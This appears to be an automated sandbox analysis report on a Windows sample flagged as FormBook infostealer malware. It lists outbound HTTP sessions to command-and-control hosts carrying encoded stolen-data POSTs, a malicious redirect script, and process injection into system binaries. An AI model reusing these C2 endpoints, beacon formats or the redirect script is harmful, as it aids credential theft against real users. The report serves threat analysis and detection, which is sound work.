Jan 11, 2025 01:01:48.504317999 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49989	23.225.159.42	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:50.552114964 CET	499	OUT	GET /sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.laohub10.net Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Jan 11, 2025 01:01:51.076904058 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49990	149.88.81.190	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:56.648313046 CET	750	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 209 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30 Data Ascii: 9V7X=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49991	149.88.81.190	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:01:59.194875002 CET	774	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d Data Ascii: 9V7X=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49992	149.88.81.190	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:01.741420031 CET	1787	OUT	POST /rq1s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/rq1s/ Cache-Control: no-cache Content-Length: 1245 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 [TRUNCATED] Data Ascii: 9V7X=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1x+2J8PoSpMvQ2Qy3O0aUV+GcN9dlxYYVISLO4TCUWsyMZAPxoJceoqmKYQ/keeCNo2soDFr7dd9vvKE1w+1KEZKWwB4OvC7JBGuo05zih8lozAg8djR+XjQ+hjmQG3q1OnURaFT7J9+qc//fmu7C9dljWKlFgUdCecnyvSUvEV7rOugR6Ne/76HFEvgpQzpFH0Co86RhU/v4Q7Zdukddz8rvPNLxUhhjFXZZMm+qHK+i87NS/WkSz15Zz8d9ARliYg7hwVMcjm3UpAw47iMFr4D1pMbhoeI8jY1i+XbzVELMvDY2p6OFZ35O9EEvih98uooFaGwzU3FReIU8JO1c7BUjdDZFUqYrVOk2prsjUC+C/H6+SKqr5+qdEiJdfLn+Jw389ksZqc34U5GwDrTGI391J1vqBSHUvGVrMbklVk8iItWs6oMJ3uDH8u+qK2DrJhNxaHb9ivWT70TGiLvQ+ECCf6+haa6g9D5EKFAMNnA3UNeBMkahJGWOUxvKLmagwooX//jWgpiQ+vHs8ifReyvQAIUUBlJBwlBa+lEWA06z3TV1mKA1SUbECuTdSezX/A5OhlTaeMg3Q2O5g46hcFXI56SRo3FETuKpBbs0c0HE3bUaxVcDOp/yHgWNJkRMKNpYTxc53fcUUeLtZsn/4mtzSv/+Z6sByzS5Bl4Kp0CkYUCjctVKS7rxY+0rQ8dsiJyfTY7hAOp071dJVb12uBjVoSS6Hra+y7LgrLEjOit/QslJwYUMl3RJjjTv9oQsyO79+OPb7zyEEYVwnzPeS96Ga2DZCqaduNNLmWNY/B5d2pnl/I4VT8zEZsRbDC [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49993	149.88.81.190	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:04.284415960 CET	497	OUT	GET /rq1s/?9V7X=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&WldT=UFzdV2kX3 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.xcvbj.asia Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49995	85.159.66.93	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:30.788394928 CET	759	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 209 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49 Data Ascii: 9V7X=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49996	85.159.66.93	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:33.353890896 CET	783	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d Data Ascii: 9V7X=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49997	85.159.66.93	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:36.109380007 CET	1796	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 1245 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 [TRUNCATED] Data Ascii: 9V7X=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxdupuBPlyZHTgZwk5lGYHgq/92fl/HMuoDMFQGEdEatPvoKhgts7cAYkR+T5jEFTDkR64hjQqKz7KR3t5R4OF6/DeuDbYO8E2ELP5tDJQigLZtiKbehZRyu9IO6HD3l4l1+2T7xqPXtEvEAdyMChdrBQMhABHAgx5NE3XaBGoY+Ezyvd23/+3rgkuGOjTIDU9Rd/WkO/As61dTh9muS38CvwRchcktNBPZa+pUYpFEVOKP9F4s7ecoRg9+Ebbbq7dASpVALVbS7sIOEFbCedPk36dzYfAf3OdyPs/eaRKMhFf4kJJ4xHtPDjW6VPJEgZ8Ta0cKSrUS2OeQjVHiGOtTeZFnTW3YD+myRPC/CqJKEKQ4SQomfBJw19orfHYdPLPqqz7A6/7QYv5ngoUXvyJbNJVmRXqMADQSIwpez0MzAhpTSn6riJ/94qBhpCzSPb9qKjHgBbQS+Joc7oYzJT/BQEMoKl2iNUJLLvNYweFCT2fEWlkJr59QajgANxpeiam/C15YqCrSiBdmVvMHbSZ7m92826oNA8ogth0McaVOIA6NA5P59mSl+wQg4AMwxPxOpcOzoXeoY13+wsalRI8ssyLgG274S3ftKTIWeHj+2G+IQweXn4WNnGuCzjS7YVmOmmDrIv8rv5xibIzkJStzuQI1h/yQk3UJbdYdEHL/X+BJGNOM1Gfm8NDFfT355457tKkMtOeNHjok+8iNlETm6Csd+9RzVDKFA+1SRpz2diEyEv1f1bycptdWn8/Il/y9UZj3hzcxg23umNRDUiwR98iKl5879lyFLb/nDs3ow+hAKVpXJv0MZiUKuJY1Y [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49999	85.159.66.93	80	6748	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:02:38.707824945 CET	500	OUT	GET /rum2/?9V7X=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&WldT=UFzdV2kX3 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.soainsaat.xyz Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile

Target ID:	0
Start time:	19:00:43
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\uG3I84bQEr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\uG3I84bQEr.exe"
Imagebase:	0x400000
File size:	1'762'816 bytes
MD5 hash:	22B40728C8FB1599479347BA89387EF4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:00:44
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'658'880 bytes
MD5 hash:	AB4B4378DE9DEF8797AA78370F33CFD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:00:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\uG3I84bQEr.exe"
Imagebase:	0x8c0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:00:45
Start date:	10/01/2025
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'594'368 bytes
MD5 hash:	EB607CDF7D5BB12D72F7C0C992646A55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:01:03
Start date:	10/01/2025
Path:	C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe"
Imagebase:	0xdd0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	19:01:05
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\bitsadmin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\bitsadmin.exe"
Imagebase:	0x5a0000
File size:	186'880 bytes
MD5 hash:	F57A03FA0E654B393BB078D1C60695F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
